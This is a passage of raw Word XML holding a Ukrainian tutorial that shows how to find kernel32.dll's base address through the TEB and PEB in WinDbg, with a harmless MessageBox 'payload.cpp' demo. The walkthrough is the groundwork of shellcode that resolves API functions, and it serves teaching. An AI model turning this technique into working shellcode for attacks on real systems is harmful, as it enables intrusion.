          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> зна</w:t>
      </w:r>
      <w:r w:rsidR="0095499E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidR="008C0DCA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>одить</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адресу функції в бібліотеці.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C33CB7C" w14:textId="7E497509" w:rsidR="002E6DA6" w:rsidRPr="006701A7" w:rsidRDefault="006701A7" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Маючи адреси цих 2 функцій</w:t>
      </w:r>
      <w:r w:rsidRPr="00D242C6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> можна викликати будь-які інші</w:t>
      </w:r>
      <w:r w:rsidR="00D242C6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> фунції з будь-якої бібліотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FEA15B" w14:textId="77777777" w:rsidR="000C106D" w:rsidRPr="00CC688F" w:rsidRDefault="000C106D" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30757569" w14:textId="4E0B144F" w:rsidR="00974F4E" w:rsidRPr="00801C28" w:rsidRDefault="00753A61" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Напишемо</w:t>
      </w:r>
      <w:r w:rsidR="005E6DDE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> код</w:t>
      </w:r>
      <w:r w:rsidR="00B3234C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B3234C" w:rsidRPr="00C76092">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00B3234C" w:rsidRPr="00C76092">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B3234C" w:rsidRPr="00C76092">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidR="0067010F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, що виводить</w:t>
      </w:r>
      <w:r w:rsidR="00EC390A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC390A" w:rsidRPr="00BF3E81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidR="00EC390A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>іалогове вікно</w:t>
      </w:r>
      <w:r w:rsidR="00CE6817">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595F5C7" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502CFE6" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE8705" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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34BE83D6" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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std;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD48B5A" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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73F2B0AB" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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rgc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[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40707A12" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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3607D862" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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MessageBoxA(0,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Message 1337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Title 1337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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66050B41" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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Log 1337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6A8DACC7" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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system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582A4B46" w14:textId="77777777" w:rsidR="00534CA7" w:rsidRDefault="00534CA7" w:rsidP="00534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EXIT_SUCCESS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A38166F" w14:textId="6996955E" w:rsidR="00534CA7" w:rsidRPr="001750CF" w:rsidRDefault="00534CA7" w:rsidP="00534CA7">
      <w:pPr>
        <w:rPr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6A883A71" w14:textId="77777777" w:rsidR="00EF1226" w:rsidRDefault="00EF1226">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F069FF" w14:textId="6C4870B7" w:rsidR="00474C09" w:rsidRPr="00F375ED" w:rsidRDefault="005B0753">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Скомпілюємо</w:t>
      </w:r>
      <w:r w:rsidR="0044782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD75D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidR="0044782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00475FF7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001750CF">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>MSCV</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3720">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019 </w:t>
      </w:r>
      <w:r w:rsidR="00345B84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і о</w:t>
      </w:r>
      <w:r w:rsidR="001A3720">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">тримаємо </w:t>
      </w:r>
      <w:r w:rsidR="001A3720" w:rsidRPr="005E36A7">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>payload.</w:t>
      </w:r>
      <w:r w:rsidR="001A3720" w:rsidRPr="00FA1FFC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="0018516E" w:rsidRPr="001936B9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1FFC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001936B9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дослідимо </w:t>
      </w:r>
      <w:r w:rsidR="00E97D53" w:rsidRPr="005E36A7">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>payload.</w:t>
      </w:r>
      <w:r w:rsidR="00E97D53" w:rsidRPr="00FA1FFC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00E97D53">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B21E5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidR="008F5A34">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000966CE" w:rsidRPr="00FA1FFC">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r w:rsidR="0059493F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00610DF6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE5C1D" w14:textId="5F777002" w:rsidR="001750CF" w:rsidRPr="002535D4" w:rsidRDefault="00BF5E7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002535D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="008E3BBF" w:rsidRPr="002535D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000912B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Пошук </w:t>
      </w:r>
      <w:r w:rsidR="00257451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>базов</w:t>
      </w:r>
      <w:r w:rsidR="000912B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ої</w:t>
      </w:r>
      <w:r w:rsidR="00257451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес</w:t>
      </w:r>
      <w:r w:rsidR="004A7AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FC5D90" w:rsidRPr="00257451">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00024338" w:rsidRPr="00257451">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="00024338" w:rsidRPr="002535D4">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00024338" w:rsidRPr="00257451">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00024338" w:rsidRPr="002535D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B81C8B" w14:textId="6E83FC5C" w:rsidR="0059493F" w:rsidRDefault="00BF5E7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Виведемо </w:t>
      </w:r>
      <w:r w:rsidR="00720F73">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>всі</w:t>
      </w:r>
      <w:r w:rsidR="002D6A8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> модулі,</w:t>
      </w:r>
      <w:r w:rsidR="00720F73">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> завантажені </w:t>
      </w:r>
      <w:r w:rsidR="00D82D90">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">у пам'ять процеса </w:t>
      </w:r>
      <w:r w:rsidR="00090709" w:rsidRPr="00677E4A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00090709" w:rsidRPr="00677E4A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00090709" w:rsidRPr="00677E4A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00720F73">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D957A19" w14:textId="1D7F885C" w:rsidR="00783953" w:rsidRPr="004B1D3D" w:rsidRDefault="00783953">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1D3D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>!peb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF1BBC" w14:textId="015202B4" w:rsidR="00783953" w:rsidRDefault="00420473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423E6990" wp14:editId="1633621C">
            <wp:extent cx="6645910" cy="2746375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1553352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528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53BD" w14:textId="6A82F5D6" w:rsidR="00420473" w:rsidRPr="00434BE9" w:rsidRDefault="001D1E31">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Бачимо, що </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73A2E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73A2E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73A2E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1E31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знаходиться </w:t>
      </w:r>
      <w:r w:rsidR="00BF3D0E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>третьою в</w:t>
      </w:r>
      <w:r w:rsidR="00127E23">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> списку.</w:t>
      </w:r>
      <w:r w:rsidR="00AF4CA9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Її базова адреса </w:t>
      </w:r>
      <w:r w:rsidR="009B0E27" w:rsidRPr="00434BE9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="009B0E27">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00570E74" w:rsidRPr="00570E74">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7ffc9ec40000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3367A860" w14:textId="77777777" w:rsidR="00144DC4" w:rsidRDefault="00144DC4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BAEE60" w14:textId="4A313B5D" w:rsidR="003F25DB" w:rsidRPr="0027013C" w:rsidRDefault="00431CB9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00431CB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="008440C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008440C3" w:rsidRPr="008440C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00434BE9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00956F91">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дослідимо </w:t>
      </w:r>
      <w:r w:rsidR="0027013C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidR="0027013C" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027013C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidR="0027013C" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027013C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
      <w:r w:rsidR="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072187" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00072187">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidR="00072187" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0027013C" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A5496A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>що</w:t>
      </w:r>
      <w:r w:rsidR="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> зберігає</w:t>
      </w:r>
      <w:r w:rsidR="005A39F3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інформацію про потік:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4D5F1" w14:textId="41705097" w:rsidR="00590C82" w:rsidRPr="00CE459E" w:rsidRDefault="00590C82">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>dt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>!_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> @$</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t>teb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B1632D" w14:textId="5BBF0EA6" w:rsidR="009E5134" w:rsidRDefault="009E5134">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA1EE0A" wp14:editId="1E35D984">
            <wp:extent cx="5980952" cy="1828571"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="652030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301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865A" w14:textId="6493D278" w:rsidR="005C37A3" w:rsidRPr="00BA1D46" w:rsidRDefault="005C37A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> знаходиться за офсетом </w:t>
      </w:r>
      <w:r w:rsidR="00A40507" w:rsidRPr="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A40507">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r w:rsidR="00BA1D46" w:rsidRPr="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA1D46">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">від початку </w:t>
      </w:r>
      <w:r w:rsidR="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB689D" w14:textId="77777777" w:rsidR="005C37A3" w:rsidRPr="005C37A3" w:rsidRDefault="005C37A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514DF40A" w14:textId="5D7F81AF" w:rsidR="009E5134" w:rsidRDefault="003435A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003435A7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3. </w:t>
      </w:r>
      <w:r w:rsidR="009E5924">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Дослідимо</w:t>
      </w:r>
      <w:r w:rsidR="0072758A" w:rsidRPr="005C37A3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC16DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127BE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127BE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127BE9" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00EC16DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00127BE9" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A5496A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>що</w:t>
      </w:r>
      <w:r w:rsidR="004E67AD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> зберігає</w:t>
      </w:r>
      <w:r w:rsidR="00ED1D1B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E67AD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інформацію про п</w:t>
      </w:r>
      <w:r w:rsidR="009569CB">
        <w:rPr>
